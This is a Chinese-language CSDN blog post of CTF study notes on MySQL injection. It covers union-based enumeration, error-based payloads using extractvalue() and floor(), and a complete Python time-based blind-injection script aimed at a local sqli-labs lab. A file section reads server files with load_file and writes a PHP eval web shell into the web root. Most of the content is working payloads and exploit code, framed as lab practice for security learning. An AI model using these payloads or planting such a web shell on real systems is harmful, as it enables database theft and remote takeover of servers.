SQL注入

置顶 已于 2022-10-27 17:56:37 修改
阅读量1.6k 收藏
点赞数 4
分类专栏: ctf相关 文章标签: sql
于 2022-05-04 23:28:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44418229/article/details/124571248
版权
本文详细介绍了MySQL的报错注入和时间盲注技术,包括通过#字符判断字段类型、查看数据库及表信息、利用extractvalue()和floor()函数进行报错注入,以及编写Python脚本实现时间盲注。内容涵盖注入技巧和实际案例,有助于提升安全测试和防护能力。
摘要由CSDN通过智能技术生成

目录

经验:

十种MySQL报错注入 - 我擦咧什么鬼 - 博客园 (cnblogs.com)

时间盲注Python脚本:

读写文件操作

常见绕过

经验:

在url注入需要提前进行url编码
如 # -> %23

一.通过 1' #判断是字符型还是数字型
字符型:select * from user where id = '$' 
数字型:select * from user where id =  $
报错的是 数字型
select * from user where id =  1' # 
不报错的是字符型
select * from user where id = '1' #

还有可能需要 1') # 来判断参数有没有括号 引申为 
1'))#      1')))#         1"))#         1")))#
#也可能是 --+ 



二. 查看返回列

order by 1....
select 1,2,3......

三.查数据库名
select database()

四.查表名
select group_concat(table_name) from information_schema.tables where table_schema = database();database() 可以用 '查到的数据库名' 替代
五.查列名
select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = '$';
六.查数据
select group_concat($1) from $2
select group_concat($11) from $2

三.报错注入常用的两个函数
extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
#如果返回长度被限制了可以用substr来截取特定的部分, extractvalue中记得用(select flag fron falg) 而不是 直接select flag from flag
select * from news where id=1 and (extractvalue(1,concat(0x7e,substr((select flag from flag),21,40),0x7e)));
floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

几个小案例:

原句:select ? from user where id = $
-> select ? from user where id = 1 and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=database()#
//在输入框中就用#,别用--+;因为这里的+不会被解析成空格
//在url栏用--+或者%23,因为#需要被编译为%23才能被识别

时间盲注Python脚本:

"""
使用说明
database_length = database_length() 返回数据库的长度
database_name(a) 传入数据库长度,返回数据库的名字
table_count() 输出表的数量
table_length = table_length() 返回表的长度
table_name(length) 传入表的长度,输出所有表的名字
column_length = column_length() 传入单个表的名字,查询单个表下的列长度
column_name(column_length,table_name) 传入表名,列长度,查询所有列名
flag_length(table_name,column_name) 传入表名,列名,返回数据长度
flag_name(table_name,column_name,flag_length)  传入表名,列名,数据长度,返回数据的值
"""

'''
语法总结:
if($,1,2) $为true,输出1,否则输出2
substr(string,count1,count2) 从count1的位置开始,截取count2个字符 如 substr(string,1,1) == s
ascii(char) 将char转化为ascii码 如 ascii(A) == 65
length(string) 返回字符串长度
database() 返回数据库名字
'''


import requests
import time
base_url="http://127.0.0.1:80/Less-6/?id="
passtime=2
#数据库名的长度
def database_length():
    #select * from news where id= 1 and sleep(1)
    #if(?,1,2) $为true,输出1,否则输出2
    #0 的时候就不行
    for i in range(1,45):
        #1+and+length%28database%28%29%29+%3D+4+and+sleep%283%29
        url=base_url+"1\" and if( length(database())={} , sleep(%s) ,1) --+  ".format(i)%passtime
        # 0%27/**/and/**/if( (length(select database())={} , sleep(2) ,1) %23
        start_time = time.time()
        response = requests.get(url)
        end_time = time.time()

        if(end_time - start_time > passtime): #说明是对的
            print("database_length->",i)
            return i
#数据库长度是4
#查数据库的名字
def database_name(length_database):
    #截取一个字符,如果是对的就跳到下一个字符
    #字符范围为0-9,a-z,A-Z
    #ran="abcdefghijklmnopqrstuvwxyz"
    result=""
    for i in range(1,length_database+1):#控制第几个字符
        for j in range(33,124) :
            #ascii(substr(database(),{i},1))={j}
            url = base_url+"1' and if(ascii(substr(database(),{},1))={},sleep({}),1) --+ ".format(i,j,passtime)
            start_time = time.time()
            response = requests.get(url)
            end_time = time.time()
            #print(i,j)
            if(end_time - start_time > passtime):
                result+=chr(j)
                break;
    print("database_name->result:", result)
#数据库名为sqli
#跑表名,将表名用group_concat连接后再跑
#表长度
#select group_concat(table_name) from information_schema.tables where table_schema = database()
#length(select group_concat(table_name) from information_schema.tables where table_schema = database())={}
def table_count():
    i=0
    while True :
        #'?id=1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(0.5),1)'.format(i)
        url = base_url + "1' and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(%s),1) --+"%passtime
        real_url = url.format(i)
        start_time=time.time()
        response=requests.get(real_url)
        end_time=time.time()
        if(end_time-start_time>passtime):
            print("table_count()->resutlt:",i)
            break
        else:
            #print(i)
            i+=1
#两张表
#跑 表名长度
def table_length():
    #用group_concat连接再一起后测试长度
    #(select group_concat(table_name) from information_schema.tables where table_schema = database())
    #length()={}
    #if($,sleep(3),1)
    i=0
    while True:
        url=base_url+"1' and if( length( (select group_concat(table_name) from information_schema.tables where table_schema = database()) )={},sleep(%s),1) --+"%passtime
        real_url = url.format(i)
        start_time = time.time()
        response = requests.get(real_url)
        end_time = time.time()
        if (end_time - start_time > passtime):
            print("table_length()->resutlt:", i)
            break
        else:
            i += 1
    return i;
def table_name(table_length):
    result=""
    for i in range(1,table_length+1):#第n个字符
        for j in range(33,127):#ascii
            #if($,sleep(3),1)
            #ascii()={}
            #substr($,{},1)
            #(select group_concat(table_name) from information_schema.tables where table_schema=database())
            url=base_url+"1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(%s),1) --+"%passtime
            real_url=url.format(i,j)
            start_time = time.time()
            response = requests.get(real_url)
            end_time = time.time()

            if (end_time - start_time > passtime):
                result+=chr(j)
                print("table_name->result:",result);
                break
#字段和表名一样,先跑长度后跑具体字符
def column_length(table_name):
        i=0
        while True:
        #if($,sleep(5),3)
        #length()={}
        #(select concat(column_name) from information_schema.columns where table_name='flag' and table_schema=database())
            url=base_url+"1' and if( length( (select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()) )={},sleep({}),3) --+ "
            real_url = url.format(table_name,i,passtime)
            start_time = time.time()
            response = requests.get(real_url)
            end_time = time.time()

            #print(i)
            if (end_time - start_time > passtime):
                 print("column_length->resutlt:", i)
                 break
            else:
            #print(i)
                i += 1

def column_name(column_length,table_name):
    result=""
    for i in range(1,column_length+1):
        for j in range(33,127):
            #if((),sleep(3),1)
            #ascii()
            #substr((),{},1)
            #(select column_name from information_schema.columns where table_name='flag' and table_schema=database())
            url=base_url+"1' and if( ascii( substr( (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()) , {} ,1 ) )={} , sleep({}) , 1) --+"
            real_url=url.format(i,j,passtime)
            start_time=time.time()
            response=requests.get(real_url)
            end_time=time.time()

            if(end_time-start_time>passtime):
                result+=chr(j)
                print("column_name->result", result)

    print("column_name->result",result)
#查数据:长度,具体字母
def flag_length(table_name,column_name):
    i=0
    while True:
        url=base_url+"1' and if( ( length( (select group_concat({}) from {}) ) )={},sleep({}),1) --+"
        real_url=url.format(column_name,table_name,i,passtime)
        start_time=time.time()
        response=requests.get(real_url)
        end_time=time.time()
        if(end_time-start_time>passtime):
            print(i)
            break
        else:
            i+=1
def flag_name(table_name,column_name,flag_length):
    result=""
    for i in range(1,flag_length+1):
        for j in range(33,127):

            #if((()={}),sleep(3),1)
            #ascii()
            #substr((),{},1)
            #(select flag from flag)
            url=base_url+"1' and if( ( ( ascii( substr( ( (select group_concat({}) from {}) ),{},1) ) )={}),sleep({}),1) --+"
            real_url=url.format(column_name,table_name,i,j,passtime)
            start_time = time.time()
            response = requests.get(real_url)
            end_time = time.time()
            if (end_time - start_time > passtime):
                result+=chr(j)
                print("flag_name->%s"%column_name,result)
                break


if __name__ == "__main__":
     database_length = database_length()

    #database_name(8)

    #table_count() #不是必要的

    #table_length = table_length()

    #table_name(table_length)

    #column_length = column_length("users")

    #column_name(20,"users")

    #flag_length("users","username")

    #flag_name("users", "password", 91)

读写文件操作

前提:该用户具有高权限

读哪些信息?用户信息,账号,密码

select load_file(' 路径 ')

如
select load_file('d:/d.txt')

select load_file('/var/www/html/flag.php')

写什么?写一句话木马

select '<?php @eval($_POST[\'attack\']);?>' into outfile '/var/www/html/aaa.php';

常见绕过

转载:SQL注入常见绕过_jjj34的博客-CSDN博客

jjj34
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
leetcode---每日一题
qq_44418229的博客
06-07 108
leetcode----爱吃香蕉的珂珂
容器管理工具Docker生态架构及部署
qq_44418229的博客
09-18 505
docker安装与卸载
CTFHUB-SQL注入-布尔盲注
最新发布
weixin_68416970的博客
06-12 683
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
ARP攻击
qq_44418229的博客
04-05 3895
1.ARP协议原理讲解 什么是ARP ARP就是地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议 工作原理 ARP协议规定,每台计算机都需要一个ARP表,用来保存IP和MAC地址的映射关系 当访问IP地址的时候就去查ARP表,从而找到对应的MAC地址 如果ARP表匹配不到,就会使用广播的方式发送一个ARP请求,目标主机收到请求后会使用单播的方式返回一个ARP响应,告知自己的MAC地址 请求的主机拿到MAC地址后,会将映射关系缓存到ARP表,而后传递到数据链路层进行协议转化...
SQL注入语句(详细)
热门推荐
m0_64118193的博客
06-02 2万+
目录一、联合查询1.判断注入点 2.查询字段 3.确定回显点 4.基础查询信息二、报错注入1.substr()函数 2.查询语句三、布尔盲注1.length( )函数 2.substr( )函数 3.ord( )函数 4.查询语句四、时间盲注1.sleep( )延迟函数 2.查询语句五、堆叠注入1.查询语句***爆库语句SQLMAP工具的使用参数用户可控:前端传递给后端的参数内容是用户可以控制的参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询当传入的id参数为
sql注入知识点总结
JunDao73的博客
02-16 3127
个人的学习记录,主要推荐学习环境,和总体的针对sql注入漏洞想要得到数据库内容的思路还有注入中利用到的函数介绍。
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sqli-less2-4(union注入)
01mx的博客
03-19 217
less2(数字型) 一、判断注入类型 输入: ?id=1 and 1=1–+ 看回显 回显正常 输入:?id=1 and 1=2–+ 回显错误 判断是sql注入是~数字型 二、进行注入 输入:?id=1 order by 3–+ 显示正常 输入:?id=1 order by 4–+ 显示错误 判断有3列 三、union注入 输入:?id=-1 union select 1,2,3–+ 输入:?id=-1 union select 1,(select group_concat(table_name)
GROUP_CONCAT
inexaustible的博客
05-23 121
GROUP_CONCAT
mysql 5注入中group_concat的使用
weixin_34293902的博客
03-02 433
mysql中的information_schema 结构用来存储数据库系统信息 information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。  | SCHEMATA ――>存储数据库名的, |——>关键字段:SCHEMA_NAME,表示数据库名称 | TABLES ――>存储表名的 ...
SQL注入中group_concat的学习笔记
kofi的博客,已停更
04-07 1386
<link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="markdown_views prism-atom-one-dark"> <svg xmlns="ht...
mysql-injection整理
criminal_1的博客
02-20 183
sql注入整理
sqli-labs 41---64
hecker_chicken的博客
02-16 429
Sqli-labs Less-41 本关没有回显位置 采用盲注 ?id=1 and left(version(),1)=5%23(注入成功 显示) 联合注入?id=0 union select 1,database(),version()–+ (无闭合) 我在sql注入天书看到另外一种方法 index.php?id=1; insert into users(id,username,passw...
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4404
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
sql注入详解
m0_67392811的博客
06-12 5911
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值